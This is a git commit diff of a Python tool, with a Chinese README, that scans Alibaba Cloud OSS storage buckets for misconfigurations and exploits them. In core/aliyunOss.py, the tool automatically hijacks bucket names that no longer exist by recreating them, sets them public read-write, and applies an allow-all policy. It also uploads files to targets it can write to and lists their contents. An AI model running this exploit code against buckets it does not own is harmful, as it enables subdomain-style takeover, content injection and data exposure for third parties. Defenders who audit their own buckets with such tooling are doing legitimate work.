AliyunOss

完成阿里云存储桶的利用
2025-06-21 02:10:51 +00:00 · 2022-03-04 19:16:52 +08:00 · 2022-03-04 19:16:52 +08:00 · d1eabcb4c0
commit d1eabcb4c0
parent fdfcebe9dd
9 changed files with 608 additions and 0 deletions
--- a/.DS_Store
+++ b/.DS_Store
--- a/README.md
+++ b/README.md
@ -1,3 +1,81 @@
 # Cloud-Bucket-Leak-Detection-Tools
 想写个存储桶的利用，先给自己画个饼
 **画饼进度**
 1、阿里云存储桶利用
 不太会用Git，代码写的也烂，有BUG直接提Issue即可（好像我连issue可能都用不明白）
 # 0x00 依赖
 + pip3 install oss2
 + pip3 install colorlog
 + pip3 install logging
 + pip3 argparse
 # 0x01 使用方法
 ```bash
 git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git
 python3 main.py -h
 ```
 随后在config/conf.py中写入自己的阿里云AK，作用如下
 1、如果可以劫持，会用该AK创建同名的存储桶
 2、用来验证合法用户
 ![image-20220304184757595](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304184757595.png)
 ## 1、当存储桶Policy权限可获取时
 ![image-20220304185015693](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304185015693.png)
 ## 2、当存储桶不存在时(自动创建并劫持)
 ![image-20220304185434168](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304185434168.png)
 输入存储桶地址即可自动检测，功能如下
 + 1、检测当前存储桶是否可劫持
  + 如果可劫持，自动在config中写入的AK账号上创建同命名的存储桶并开放所有权限
 + 2、检测当前存储桶是否可列出Object
 + 3、检测当前存储桶是否可获取ACL
 + 4、检测当前存储桶是否可获取Policy策略表
 + 5、检测存储桶是否可上传Object
 ## 一、阿里云存储桶利用
 ### 1、实现思路
 首先实现了`OssBucketCheckFromSDK`类
 + AliyunOssBucketDoesBucketExist
  + 用来判断当前存储桶是否存在，首先如果存储桶存在那么就返回一个True，继续走下面的流程，如果存储桶不存在，那么就调用OssBucketExploitFromSDK类，创建存储桶，并且设置ACL权限，上传访问策略，随后上传一个文件进行验证，如果存储桶此时存在或者为AccessDenied，继续走下面的流程
 + AliyunOssGetBucketObjectList
  + 判断是否可以遍历存储桶中的内容，如果可以，则会选择前3个内容进行遍历并显示
    > 如果想遍历更多的内容，可以查看aliyunOss.py中的AliyunOssGetBucketObjectList方法
 + AliyunOssGetBucketAcl
  + 判断能否访问当前Bucket的ACL，如果可以的话，就返回当前Bucket的ACL，如果不可以就继续走下面的Check流程
 + AliyunOssGetBucketPolicy
  + 判断能否访问当前Bucket的Policy，如果可以的话，就会返回当前Bucket的ACL，如果不可以就继续走下面的Check
 + AliyunOssGetBucketObject
  + 尝试上传一个文件，是否可以成功上传
 ### 
--- a/config/BannerInfo.py
+++ b/config/BannerInfo.py
@ -0,0 +1,189 @@
 """
 Banner Info From http://patorjk.com/software/taag/#p=display&f=TRaC%20Mini&t=UzJu
 """
 import random
 Banner_1 = '''                                             
                                   ,---._                 
                                 .-- -.' \                
         ,--,                    |    |   :               
       ,'_ /|        ,----,      :    ;   |         ,--,  
  .--. |  | :      .'   .`|      :        |       ,'_ /|  
 ,'_ /| :  . |   .'   .'  .'      |    :   :  .--. |  | :  
 |  ' | |  . . ,---, '   ./       :         ,'_ /| :  . |  
 |  | ' |  | | ;   | .'  /        |    ;   ||  ' | |  . .  
 :  | | :  ' ; `---' /  ;--,  ___ l         |  | ' |  | |  
 |  ; ' |  | '   /  /  / .`|/    /\    J   ::  | : ;  ; |  
 :  | : ;  ; | ./__;     .'/  ../  `..-    ,'  :  `--'   \ 
 '  :  `--'   \;   |  .'   \    \         ; :  ,      .-./ 
 :  ,      .-./`---'        \    \      ,'   `--`----'     
 `--`----'                  "---....--'                   
    Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju        
 '''
 Banner_2 = '''
 /$$   /$$              /$$$$$          
 | $$  | $$             |__  $$          
 | $$  | $$ /$$$$$$$$      | $$ /$$   /$$
 | $$  | $$|____ /$$/      | $$| $$  | $$
 | $$  | $$   /$$$$/  /$$  | $$| $$  | $$
 | $$  | $$  /$$__/  | $$  | $$| $$  | $$
 |  $$$$$$/ /$$$$$$$$|  $$$$$$/|  $$$$$$/
 \______/ |________/ \______/  \______/                   
     Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_3 = '''
 .----------------.  .----------------.  .----------------.  .----------------. 
 | .--------------. || .--------------. || .--------------. || .--------------. |
 | | _____  _____ | || |   ________   | || |     _____    | || | _____  _____ | |
 | ||_   _||_   _|| || |  |  __   _|  | || |    |_   _|   | || ||_   _||_   _|| |
 | |  | |    | |  | || |  |_/  / /    | || |      | |     | || |  | |    | |  | |
 | |  | '    ' |  | || |     .'.' _   | || |   _  | |     | || |  | '    ' |  | |
 | |   \ `--' /   | || |   _/ /__/ |  | || |  | |_' |     | || |   \ `--' /   | |
 | |    `.__.'    | || |  |________|  | || |  `.___.'     | || |    `.__.'    | |
 | |              | || |              | || |              | || |              | |
 | '--------------' || '--------------' || '--------------' || '--------------' |
 '----------------'  '----------------'  '----------------'  '----------------' 
    Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_4 = '''
 .------..------..------..------.
 |U.--. ||Z.--. ||J.--. ||U.--. |
 | (\/) || :(): || :(): || (\/) |
 | :\/: || ()() || ()() || :\/: |
 | '--'U|| '--'Z|| '--'J|| '--'U|
 `------'`------'`------'`------'
    Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_5 = '''
      ___           ___                      ___     
     /\  \         /\__\        ___         /\  \    
     \:\  \       /::|  |      /\__\        \:\  \   
      \:\  \     /:/:|  |     /:/__/         \:\  \  
  ___  \:\  \   /:/|:|  |__  /::\  \     ___  \:\  \ 
 /\  \  \:\__\ /:/ |:| /\__\ \/\:\  \   /\  \  \:\__|
 \:\  \ /:/  / \/__|:|/:/  /  ~~\:\  \  \:\  \ /:/  /
  \:\  /:/  /      |:/:/  /      \:\__\  \:\  /:/  / 
   \:\/:/  /       |::/  /       /:/  /   \:\/:/  /  
    \::/  /        |:/  /       /:/  /     \::/  /   
     \/__/         |/__/        \/__/       \/__/    
         Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_6 = """
 d       b sSSSSSs         d d       b 
 S       S      s          S S       S 
 S       S     s           S S       S 
 S       S    s            S S       S 
 S       S   s     d       P S       S 
 S     S   s       S     S   S     S  
  "sss"   sSSSSSs   "sss"     "sss"   
    Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 """
 Banner_7 = '''
  _   _               _          
 | | | |    ___    _ | |  _  _   
 | |_| |   |_ /   | || | | +| |  
  \___/   _/__|   _\__/   \_,_|  
 _|"""""|_|"""""|_|"""""|_|"""""| 
 "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
    Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_8 = '''
 ██╗   ██╗███████╗     ██╗██╗   ██╗
 ██║   ██║╚══███╔╝     ██║██║   ██║
 ██║   ██║  ███╔╝      ██║██║   ██║
 ██║   ██║ ███╔╝  ██   ██║██║   ██║
 ╚██████╔╝███████╗╚█████╔╝╚██████╔╝
 ╚═════╝ ╚══════╝ ╚════╝  ╚═════╝ 
     Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_9 = '''
 █    ██ ▒███████▒ ▄▄▄██▀▀▀█    ██ 
 ██  ▓██▒▒ ▒ ▒ ▄▀░   ▒██   ██  ▓██▒
 ▓██  ▒██░░ ▒ ▄▀▒░    ░██  ▓██  ▒██░
 ▓▓█  ░██░  ▄▀▒   ░▓██▄██▓ ▓▓█  ░██░
 ▒▒█████▓ ▒███████▒ ▓███▒  ▒▒█████▓ 
 ░▒▓▒ ▒ ▒ ░▒▒ ▓░▒░▒ ▒▓▒▒░  ░▒▓▒ ▒ ▒ 
 ░░▒░ ░ ░ ░░▒ ▒ ░ ▒ ▒ ░▒░  ░░▒░ ░ ░ 
 ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░   ░░░ ░ ░ 
   ░       ░ ░     ░   ░     ░     
         ░                         
             Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_10 = '''
 ▄         ▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄         ▄ 
 ▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌
 ▐░▌       ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ ▀▀▀▀▀█░█▀▀▀ ▐░▌       ▐░▌
 ▐░▌       ▐░▌          ▐░▌      ▐░▌    ▐░▌       ▐░▌
 ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌      ▐░▌    ▐░▌       ▐░▌
 ▐░▌       ▐░▌▐░░░░░░░░░░░▌      ▐░▌    ▐░▌       ▐░▌
 ▐░▌       ▐░▌▐░█▀▀▀▀▀▀▀▀▀       ▐░▌    ▐░▌       ▐░▌
 ▐░▌       ▐░▌▐░▌                ▐░▌    ▐░▌       ▐░▌
 ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄█░▌    ▐░█▄▄▄▄▄▄▄█░▌
 ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░▌    ▐░░░░░░░░░░░▌
 ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀      ▀▀▀▀▀▀▀▀▀▀▀ 
     Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_11 = '''
   _     _      _     _      _     _      _     _   
  (c).-.(c)    (c).-.(c)    (c).-.(c)    (c).-.(c)  
   / ._. \      / ._. \      / ._. \      / ._. \   
 __\( Y )/__  __\( Y )/__  __\( Y )/__  __\( Y )/__ 
 (_.-/'-'\-._)(_.-/'-'\-._)(_.-/'-'\-._)(_.-/'-'\-._)
   || U ||      || Z ||      || J ||      || U ||   
 _.' `-' '._  _.' `-' '._  _.' `-' '._  _.' `-' '._ 
 (.-./`-'\.-.)(.-./`-'\.-.)(.-./`-'\.-.)(.-./`-'\.-.)
 `-'     `-'  `-'     `-'  `-'     `-'  `-'     `-' 
     Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_12 = '''
 ===================================
 =  ====  ==============    ========
 =  ====  ===============  =========
 =  ====  ===============  =========
 =  ====  ==      =======  ===  =  =
 =  ====  ======  =======  ===  =  =
 =  ====  =====  ========  ===  =  =
 =  ====  ====  ====  ===  ===  =  =
 =   ==   ===  =====  ===  ===  =  =
 ==      ===      ===     =====    =
 ===================================
    Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 Banner_13 = '''
 >=>     >=>                >=>          
 >=>     >=>                >=>          
 >=>     >=> >====>>=>      >=> >=>  >=> 
 >=>     >=>      >=>       >=> >=>  >=> 
 >=>     >=>    >=>         >=> >=>  >=> 
 >=>     >=>   >=>     >>   >=> >=>  >=> 
  >====>    >=======>  >===>     >==>=> 
      Autor: UzJu   Email: UzJuer@163.com  GitHub: github.com/uzju  
 '''
 def echoRandomBannerInfo():
    eval(f"print(Banner_{random.randint(1, 13)})")
--- a/config/UzJu.html
+++ b/config/UzJu.html
@ -0,0 +1 @@
 Put By https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git
--- a/config/init.py
+++ b/config/init.py
@ -0,0 +1,7 @@
 #!/usr/bin/python3.8.4 (python版本)
 # -*- coding: utf-8 -*-
 # @Author  : UzJu@菜菜狗
 # @Email   : UzJuer@163.com
 # @Software: PyCharm
 # @Time    : 2022/2/28 5:25 PM
 # @File    : __init__.py
--- a/config/conf.py
+++ b/config/conf.py
@ -0,0 +1,17 @@
 #!/usr/bin/python3.8.4 (python版本)
 # -*- coding: utf-8 -*-
 # @Author  : UzJu@菜菜狗
 # @Email   : UzJuer@163.com
 # @Software: PyCharm
 # @Time    : 2022/2/28 5:18 PM
 # @File    : conf.py
 from fake_useragent import UserAgent
 UA = UserAgent(use_cache_server=False)
 headers = {
    "UserAgent": UA.random
 }
 AK = ""
 SECRET = ""
--- a/config/echoToFile.py
+++ b/config/echoToFile.py
@ -0,0 +1,14 @@
 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 # @Author  : UzJu@菜菜狗
 # @Email   : UzJuer@163.com
 # @Software: PyCharm
 # @Time    : 2022/3/4 下午5:24
 # @File    : echoToFile.py
 import csv
 class Echo:
    def __init__(self):
        pass
--- a/core/aliyunOss.py
+++ b/core/aliyunOss.py
@ -0,0 +1,202 @@
 #!/usr/bin/python3.8.4 (python版本)
 # -*- coding: utf-8 -*-
 # @Author  : UzJu@菜菜狗
 # @Email   : UzJuer@163.com
 # @Software: PyCharm
 # @Time    : 2022/2/28 4:52 PM
 # @File    : aliyunOss.py
 # 你猜我什么时候画的饼：）
 '''
 代码实现思路
 1、使用GET POST PUT的请求来获取
 2、使用OSS2 SDK实现
 '''
 # 以下代码思路是使用OssSDK来实现
 from itertools import islice
 import oss2
 import json
 from config import conf
 import logging
 import os
 import csv
 module_logger = logging.getLogger("mainModule.AliyunOss")
 def putCsvInfoResult(target, info):
    with open(f'{os.getcwd()}/results/{target}.csv', 'a+', newline='') as f:
        f_csv = csv.writer(f)
        rows = [
            [f"{target}", info]
        ]
        f_csv.writerows(rows)
 def setCsvHeaders(target):
    headers = ['存储桶地址', '权限']
    with open(f'{os.getcwd()}/results/{target}.csv', 'a+', newline='') as f:
        f_csv = csv.writer(f)
        f_csv.writerow(headers)
 class OssBucketExploitFromSDK:
    def __init__(self, target, location):
        self.target = target
        self.location = location
        auth = oss2.Auth(conf.AK, conf.SECRET)
        self.bucket = oss2.Bucket(auth, f'http://{location}.aliyuncs.com', self.target)
        self.logger = logging.getLogger("mainModule.AliyunOss.Exploit.module")
    def AliyunOssCreateBucket_Exp(self):
        try:
            self.bucket.create_bucket()
            self.logger.info(f"BucketName {self.target} Ceate Success:)")
            self.AliyunOssPutBucketAcl_Exp()
            self.AliyunOssPutBucketPolicy_Exp()
            self.AliyunOssPutObject_Exp()
            self.AliyunOssGetBucketPolicy_Exp()
        except Exception as e:
            self.logger.warning(f"BucketName {self.target} Ceate FAILD:( {e}")
    def AliyunOssPutBucketAcl_Exp(self):
        try:
            self.bucket.put_bucket_acl(oss2.BUCKET_ACL_PUBLIC_READ_WRITE)
            self.logger.info(f"BucketName {self.target} Acl Permissions PUBLIC_READ_WRITE:)")
        except Exception as e:
            self.logger.warning(f"BucketName {self.target} Acl Put FAILD:( {e}")
    def AliyunOssGetBucketPolicy_Exp(self):
        try:
            result = self.bucket.get_bucket_policy()
            policy_json = json.loads(result.policy)
            self.logger.info(f"BucketName {self.target} Policy Get Success :)\n {policy_json}")
        except Exception as e:
            self.logger.warning(f"BucketName {self.target} Policy Get FAILD:( {e}")
    def AliyunOssPutBucketPolicy_Exp(self):
        try:
            bucket_info = self.bucket.get_bucket_info()
            strategy = {
                "Version": "1",
                "Statement": [{
                    "Effect": "Allow",
                    "Action": [
                        "oss:*"
                    ],
                    "Principal": [
                        "*"
                    ],
                    "Resource": [
                        f"acs:oss:*:{bucket_info.owner.id}:{self.target}",
                        f"acs:oss:*:{bucket_info.owner.id}:{self.target}/*"
                    ]
                }]
            }
            self.bucket.put_bucket_policy(json.dumps(strategy))
            self.logger.info(f"BucketName {self.target} Policy Put Success :)")
        except Exception as e:
            self.logger.warning(f"BucketName {self.target} Policy Put FAILD:( {e}")
    def AliyunOssPutObject_Exp(self):
        try:
            self.bucket.put_object_from_file("UzJu.html", f"{os.getcwd()}/config/UzJu.html")
            self.logger.info(f"BucketName {self.target} Put Object Success:)")
            self.logger.info(f"Go Browser Open {self.target}.{self.location}.aliyuncs.com/UzJu.html")
        except Exception as e:
            self.logger.warning(f"BucketName {self.target} Put Object FAILD:( {e}")
 class OssBucketCheckFromSDK:
    def __init__(self, target, location):
        self.target = target
        self.location = location
        self.logger = logging.getLogger("mainModule.AliyunOss.module")
        auth = oss2.Auth(conf.AK, conf.SECRET)
        self.bucket = oss2.Bucket(auth, f'http://{location}.aliyuncs.com', self.target)
        self.Exploit = OssBucketExploitFromSDK(self.target, location)
        # 设置csvHeaders头
        # setCsvHeaders(f"{target}.{location}.aliyuncs.com")
        self.headers = [['Bucket', 'ListObject', 'GetBucketPolicy', 'PutBucketPolicy', 'GetBucketAcl', 'PutBucketAcl', 'PutBucketObject']]
        self.CheckResult = []
    def AliyunOssPutBucketPolicy(self, getOssResource):
        """
        PutBucketPolicy
        危险操作，会更改存储桶的策略组，建议查看AliyunOssgetBucketPolicy来自行判断
        是否拥有AliyunOssPutBucketPolicy权限，如果用代码的方式写入会存在问题
        1、写入后无法还原（当然这里可以使用备份原有的策略，然后再上传新的策略）这里又会遇到一个新的问题
            如果只是存在PutBucketPolicy我们Put后是无法知道对方的ResourceID的
        所以该函数只在OssBucketExploitFromSDK类中实现了，详情请看AliyunOssPutBucketPolicy_Exp方法
        """
        pass
    def AliyunOssGetBucketPolicy(self):
        try:
            result = self.bucket.get_bucket_policy()
            policy_json = json.loads(result.policy)
            self.logger.info(f"Target: {self.target}, get Bucket Policy:)\n{policy_json}")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target}, Bucket Policy AccessDenied:(")
    def AliyunOssBucketDoesBucketExist(self):
        try:
            self.bucket.get_bucket_info()
            self.logger.info(f"Target: {self.target}, Bucket Exist:)")
            return True
        except oss2.exceptions.NoSuchBucket:
            self.logger.warning(f"Target: {self.target}, NoSuckBucket:) Now Hijack Bucket")
            self.Exploit.AliyunOssCreateBucket_Exp()
            return False
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target}, AccessDenied:(")
            return True
        except Exception as e:
            self.logger.error(f"Target: {self.target} Except INFO: {e}")
    def AliyunOssGetBucketAcl(self):
        try:
            self.logger.info(f"Target: {self.target} Bucket Acl: {self.bucket.get_bucket_acl().acl}")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target} get Bucket Acl AccessDenied:(")
    def AliyunOssPutbucketAcl(self):
        try:
            self.bucket.put_bucket_acl(oss2.BUCKET_ACL_PUBLIC_READ_WRITE)
            self.logger.info(f"Target: {self.target} Put Bucket Acl Success:)")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target} Put Bucket Acl AccessDenied:(")
    def AliyunOssGetBucketObjectList(self):
        try:
            self.logger.info("Try to list Object")
            for Object in islice(oss2.ObjectIterator(self.bucket), 3):
                self.logger.info(f"Object Name: {Object.key}")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target} ListObject AccessDenid")
            return
        self.logger.info(f"Target: {self.target} Exsit traverse Object:)")
        # putCsvInfoResult(f"{self.target}.{self.location}.aliyuncs.com", "ListObject")
    def AliyunOssPutBucketObject(self):
        try:
            self.bucket.put_object_from_file('UzJu.txt', f'{os.getcwd()}/config/UzJu.html')
            self.logger.info(f"Target: {self.target} Put Object Success:)")
            self.logger.info(f"Go Browser Open {self.target}.{self.location}.aliyuncs.com/UzJu.html")
        except oss2.exceptions.AccessDenied:
            self.logger.warning(f"Target: {self.target} Put Object AccessDenied:(")
 def CheckBucket(target, location):
    try:
        check = OssBucketCheckFromSDK(target, location)
        if check.AliyunOssBucketDoesBucketExist():
            check.AliyunOssGetBucketObjectList()
            check.AliyunOssGetBucketAcl()
            check.AliyunOssGetBucketPolicy()
            check.AliyunOssPutBucketObject()
        module_logger.info(">" * 80)
    except Exception as e:
        module_logger.error(f"Target: {target} Chceck Faild:( {e}")
--- a/main.py
+++ b/main.py
@ -0,0 +1,100 @@
 #!/usr/bin/env python
 # -*- coding: UTF-8 -*-
 '''
@Project ：UzJuSecurityTools 
@File    ：main.py
@Author  ：UzJu
@Date    ：2022/2/22 18:19 
@Email   ：UzJuer@163.com
 '''
 import logging
 import sys
 import colorlog
 import datetime
 from config import BannerInfo
 import requests
 import argparse
 from core import aliyunOss
 NowTime = datetime.datetime.now().strftime('%Y-%m-%d_%H_%M_%S')
 logger = logging.getLogger("mainModule")
 log_colors_config = {
    'DEBUG': 'white',  # cyan white
    'INFO': 'green',
    'WARNING': 'yellow',
    'ERROR': 'red',
    'CRITICAL': 'bold_red',
 }
 # 输出到控制台
 console_handler = logging.StreamHandler()
 # 输出到文件
 file_handler = logging.FileHandler(filename=f'./logs/{NowTime}.log', mode='a', encoding='utf8')
 # 日志级别，logger 和 handler以最高级别为准，不同handler之间可以不一样，不相互影响
 logger.setLevel(logging.DEBUG)
 console_handler.setLevel(logging.DEBUG)
 file_handler.setLevel(logging.INFO)
 # 日志输出格式
 file_formatter = logging.Formatter(
    fmt='[%(asctime)s.%(msecs)03d] %(filename)s -> %(funcName)s line:%(lineno)d [%(levelname)s] : %(message)s',
    datefmt='%Y-%m-%d  %H:%M:%S'
 )
 console_formatter = colorlog.ColoredFormatter(
    fmt='%(log_color)s[%(asctime)s.%(msecs)03d] %(filename)s -> %(funcName)s line:%(lineno)d [%(levelname)s] : %(message)s',
    datefmt='%Y-%m-%d  %H:%M:%S',
    log_colors=log_colors_config
 )
 console_handler.setFormatter(console_formatter)
 file_handler.setFormatter(file_formatter)
 # 重复日志问题：
 # 1、防止多次addHandler；
 # 2、loggername 保证每次添加的时候不一样；
 # 3、显示完log之后调用removeHandler
 if not logger.handlers:
    logger.addHandler(console_handler)
    logger.addHandler(file_handler)
 def initialize(target):
    """
    UserDisable
    错误消息：UserDisable
    问题原因：账号欠费或者由于安全原因，账号被禁用。
    解决方案：请检查账号是否已欠费，或联系技术支持进行安全受限核查。
    """
    try:
        resp = requests.get(f"http://{target}")
        print("Target>>>> ", target)
        print("resp.info>>>> ", resp.text)
        if 'html' in resp.text or 'UserDisable' in resp.text:
            return False
        else:
            return True
    except requests.exceptions.ConnectionError as e:
        logger.error(f"Target: {target}ConnectionError Except INFO: {e}")
        return False
 if __name__ == '__main__':
    BannerInfo.echoRandomBannerInfo()
    try:
        parser = argparse.ArgumentParser()
        parser.add_argument('-aliyun', dest='aliyun', help='python3 -aliyun UzJu.oss-cn-beijing.aliyuncs.com')
        parser.add_argument('-f', '--file', dest='file', help='python3 -f/--file url.txt')
        args = parser.parse_args()
        if args.aliyun:
            getTargetBucket = args.aliyun.split(".")
            aliyunOss.CheckBucket(getTargetBucket[0], getTargetBucket[1])
        if args.file:
            with open(args.file, 'r') as f:
                for i in f.read().splitlines():
                    getTargetBucket = i.split(".")
                    aliyunOss.CheckBucket(getTargetBucket[0], getTargetBucket[1])
    except KeyboardInterrupt:
        logger.error("KeyError Out")
		`@ -0,0 +1 @@`
							`Put By https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git`